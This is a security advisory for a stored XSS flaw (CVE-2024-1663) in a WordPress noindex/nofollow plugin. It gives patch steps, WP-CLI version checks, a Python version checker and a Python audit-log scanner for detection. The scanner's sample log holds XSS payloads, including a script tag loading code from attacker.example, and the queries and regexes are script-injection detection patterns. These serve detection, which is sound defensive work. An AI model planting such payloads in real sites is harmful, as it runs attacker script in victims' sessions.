CVE-2024-1663

4.8 MEDIUM

📋 TL;DR

This is a stored cross-site scripting (XSS) flaw in the Ultimate Noindex Nofollow Tool II WordPress plugin. The plugin does not sanitise or escape some of its settings, so a user with the administrator role can save HTML or JavaScript that is later rendered, and executed, in the browser of other users who view the affected pages. On a normal single-site install administrators already hold the unfiltered_html capability, so this only crosses a real security boundary where that capability is withheld from site admins: WordPress multisite (where only super admins have it by default) or sites hardened with DISALLOW_UNFILTERED_HTML.

💻 Affected Systems

Products:
  • Ultimate Noindex Nofollow Tool II WordPress Plugin
Versions: All versions before 1.3.6
Operating Systems: All operating systems running WordPress
Default Config Vulnerable: ⚠️ Yes
Notes: Particularly impactful on WordPress multisite, where site administrators do not hold unfiltered_html by default (only super admins do). That capability is what is supposed to gate the right to store raw markup, and the plugin does not honour it, so a site admin can store script that would otherwise have been rejected. The same applies to single-site installs that set DISALLOW_UNFILTERED_HTML.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker holding (or having compromised) an administrator account injects script that runs in the browser of every user who views the affected page, including super admins on a multisite network. WordPress authentication cookies are HttpOnly by default, so the realistic payload is not document.cookie theft but driving the victim's authenticated session: script on the page can read the victim's nonces and perform actions with the victim's privileges, or redirect visitors to phishing sites.

🟠

Likely Case

Malicious administrator or compromised admin account injects JavaScript payloads that affect other users viewing plugin settings pages, potentially leading to session hijacking or credential theft.

🟢

If Mitigated

With proper access controls and admin account security, impact is limited to authorized administrators who would need to intentionally exploit their own privileges.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires admin-level access. The vulnerability is well-documented with proof-of-concept available through WPScan.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.3.6

Vendor Advisory: https://wpscan.com/vulnerability/6d101f2b-e903-4e64-92cc-e550abb52d6f/

Restart Required: No

Instructions:

1. Log into the WordPress admin panel (on multisite, use Network Admin, since plugins are installed and updated network-wide).
2. Navigate to Plugins → Installed Plugins.
3. Find 'Ultimate Noindex Nofollow Tool II'.
4. Click 'Update Now' if available, or download version 1.3.6 or later from the WordPress.org plugin repository and replace the plugin directory.
5. Confirm the plugin is still active (an in-place update keeps it active; reactivate it after a manual replacement).

🔧 Temporary Workarounds

Disable vulnerable plugin (all platforms)

Temporarily deactivate the plugin until the patched version can be installed (on multisite, add --network to deactivate it for every site):

wp plugin deactivate ultimate-noindex-nofollow-tool-ii

Restrict admin access (all platforms)

Implement strict access controls and monitoring for admin accounts. The plugin only becomes a security boundary where admins lack unfiltered_html, so the set of people who can edit its settings is the whole attack surface.

🧯 If You Can't Patch

  • Remove the administrator role from anyone who does not need it and require multi-factor authentication for every remaining admin account; on multisite, also review who holds super admin, since those are the users most likely to view what a site admin has stored
  • Install a web application firewall with XSS rules and monitor admin activity, but treat it as a speed bump only: it inspects the settings form submission, so an encoded or obfuscated payload can get past it, and it does nothing about script that is already stored

🔍 How to Verify

Check if Vulnerable:

Look up the plugin version in the WordPress admin panel under Plugins → Installed Plugins (Network Admin → Plugins on multisite), or from the WordPress root with WP-CLI:

wp plugin list --name='ultimate-noindex-nofollow-tool-ii' --field=version

Any version below 1.3.6 is vulnerable. Compare version numbers numerically, component by component, rather than as strings.

Verify Fix Applied:

Re-run the same command and confirm the reported version is 1.3.6 or higher.
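The version check above, scripted so it can run across many sites, as an added example for this advisory (not code from the plugin or from WPScan). It parses the JSON that `wp plugin list --format=json` prints, compares the version numerically against the fixed release, and falls back to a constructed sample when WP-CLI is not on the path; the sample JSON is made up, the WP-CLI command and its output fields are real.

```python
"""Decide whether an installed copy of Ultimate Noindex Nofollow Tool II is
still below the fixed release (1.3.6), from `wp plugin list --format=json` output.

Added example for this advisory; not code from the plugin or from WPScan.
"""
import json
import re
import subprocess
from typing import List, Optional, Tuple

PLUGIN_SLUG = "ultimate-noindex-nofollow-tool-ii"
FIXED_VERSION = (1, 3, 6)   # CVE-2024-1663 is fixed in 1.3.6

# Constructed sample of what `wp plugin list --format=json` prints; the
# akismet entry is there only to show that other plugins are ignored.
SAMPLE_WP_CLI_JSON = (
    '[{"name":"ultimate-noindex-nofollow-tool-ii","status":"active",'
    '"update":"available","version":"1.3.5"},'
    '{"name":"akismet","status":"inactive","update":"none","version":"5.3"}]'
)


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '1.3.5', '1.3' or '1.3.6-beta1' into a comparable numeric tuple.

    Comparing version strings lexically is the classic mistake ('1.10.0' < '1.3.6'
    is True as strings), so compare integer components instead. Missing
    components are padded with zeros so that 1.3 == 1.3.0.
    """
    m = re.match(r"\s*(\d+(?:\.\d+)*)", version)
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_vulnerable(version: str) -> bool:
    """True when the installed version is older than the fixed release."""
    return parse_version(version) < FIXED_VERSION


def vulnerable_installs(wp_cli_json: str) -> List[dict]:
    """Return the entries from `wp plugin list --format=json` that are this
    plugin at a vulnerable version."""
    return [
        entry for entry in json.loads(wp_cli_json)
        if entry.get("name") == PLUGIN_SLUG and is_vulnerable(entry.get("version", "0"))
    ]


def run_wp_plugin_list(site_url: Optional[str] = None) -> str:
    """Invoke WP-CLI from the WordPress root. --url selects a site on multisite."""
    cmd = ["wp", "plugin", "list", "--format=json"]
    if site_url:
        cmd.append(f"--url={site_url}")
    return subprocess.run(cmd, check=True, capture_output=True, text=True).stdout


if __name__ == "__main__":
    try:
        output = run_wp_plugin_list()
    except (FileNotFoundError, subprocess.CalledProcessError):
        print("wp-cli not available here; checking the constructed sample instead")
        output = SAMPLE_WP_CLI_JSON
    for entry in vulnerable_installs(output):
        print(f"VULNERABLE: {entry['name']} {entry['version']} (< 1.3.6)")
```

Run it from the WordPress root of each site (or loop over `--url` values on a multisite network). Anything it prints as VULNERABLE should go straight into the update procedure above.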

📡 Detection & Monitoring

Log Indicators:

  • Unusual admin activity modifying plugin settings
  • JavaScript payloads in plugin option updates
  • Multiple failed admin login attempts followed by successful login

Network Indicators:

  • Unexpected JavaScript loading from plugin settings pages
  • Admin panel requests containing script tags or JavaScript functions

SIEM Query:

Illustrative only; field names depend on the audit-log plugin or agent feeding the SIEM. The first query inventories sites still running a vulnerable build (a plain string comparison on version misorders values such as 1.10.0 against 1.3.6, so prefer a numeric version field if your platform has one); the second looks for script-like content being written to the plugin's options:

source="wordpress" AND event="plugin_updated" AND plugin="ultimate-noindex-nofollow-tool-ii" AND version<"1.3.6"

source="wordpress" AND event="option_updated" AND plugin="ultimate-noindex-nofollow-tool-ii" AND (new_value="*<script*" OR new_value="*onerror=*" OR new_value="*javascript:*")
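The log indicator "JavaScript payloads in plugin option updates", implemented as a scanner over audit-log lines, as an added example for this advisory (not code from the plugin, WPScan or any audit-log product). The JSON-lines format, the field names (event, user, role, site_id, option, new_value) and the option-name prefix are assumptions; the sample lines are constructed. Map them to whatever your activity-log plugin actually emits and to the plugin's real option names in wp_options.

```python
"""Scan a WordPress audit log for script-like values written to this plugin's
settings: the log indicator 'JavaScript payloads in plugin option updates'.

Added example for this advisory, not code from the plugin, WPScan or any
audit-log product. The JSON-lines format and field names (event, user, role,
site_id, option, new_value) are assumptions, as is the option name prefix.
"""
import html
import json
import re
from typing import Dict, List

# Constructed sample log lines. The entity-encoded third line shows why the
# value is decoded before matching: settings are often stored escaped and
# decoded again when the settings page renders them.
SAMPLE_AUDIT_LOG = """
{"ts":"2024-02-20T10:01:02Z","event":"option_updated","user":"alice","role":"administrator","site_id":3,"option":"ultimate_noindex_nofollow_settings","new_value":"noindex,nofollow"}
{"ts":"2024-02-20T10:05:44Z","event":"option_updated","user":"mallory","role":"administrator","site_id":3,"option":"ultimate_noindex_nofollow_settings","new_value":"<script src=https://attacker.example/x.js></script>"}
{"ts":"2024-02-20T10:06:10Z","event":"option_updated","user":"mallory","role":"administrator","site_id":3,"option":"ultimate_noindex_nofollow_settings","new_value":"&lt;img src=x onerror=alert(1)&gt;"}
{"ts":"2024-02-20T10:07:00Z","event":"option_updated","user":"bob","role":"administrator","site_id":1,"option":"blogdescription","new_value":"<b>Just another site</b>"}
{"ts":"2024-02-20T10:08:00Z","event":"plugin_updated","user":"bob","plugin":"ultimate-noindex-nofollow-tool-ii","version":"1.3.5"}
"""

# Patterns that indicate active content rather than plain text. They are
# deliberately broad: a setting for a noindex/nofollow plugin should never
# legitimately contain any of these.
SCRIPT_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "inline_event_handler": re.compile(r"<[^>]*\son[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "embedding_tag": re.compile(r"<\s*(iframe|object|embed|svg|math)\b", re.I),
}


def script_indicators(value: str) -> List[str]:
    """Names of the patterns found in the value, after HTML-entity decoding."""
    decoded = html.unescape(value)
    return [name for name, pat in SCRIPT_PATTERNS.items() if pat.search(decoded)]


def scan_audit_log(log_text: str, option_prefix: str = "ultimate_noindex") -> List[Dict]:
    """Return one finding per option_updated event for this plugin whose new
    value looks like script. Lines that are not JSON are skipped, not fatal."""
    findings: List[Dict] = []
    for raw in log_text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue
        if event.get("event") != "option_updated":
            continue
        if not str(event.get("option", "")).startswith(option_prefix):
            continue
        hits = script_indicators(str(event.get("new_value", "")))
        if hits:
            findings.append({
                "ts": event.get("ts"),
                "user": event.get("user"),
                "role": event.get("role"),
                "site_id": event.get("site_id"),
                "option": event.get("option"),
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_audit_log(SAMPLE_AUDIT_LOG):
        print(f"{f['ts']} site={f['site_id']} user={f['user']} ({f['role']}) "
              f"wrote {', '.join(f['indicators'])} to {f['option']}")
```

Against the sample, alice's plain value and bob's unrelated option are ignored, while both of mallory's writes are reported, the second only because the value is entity-decoded before matching. Alerting on the user and site_id of each finding is what turns this into a lead for the incident response: on multisite it tells you which site admin stored the payload and therefore which super admins may have viewed it.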
